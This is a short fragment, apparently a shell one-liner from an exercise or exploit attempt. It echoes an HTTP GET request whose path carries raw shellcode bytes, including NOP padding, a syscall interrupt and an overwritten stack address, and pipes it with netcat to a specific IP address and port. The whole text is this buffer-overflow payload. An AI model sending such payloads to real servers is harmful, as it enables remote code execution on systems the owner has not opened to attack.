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-e "GET /\x90\xb0\x01\x31\xdb\xcd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20\xD0\xFF\xFF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\x90 HTTP" | nc -v 152.3.137.81 9278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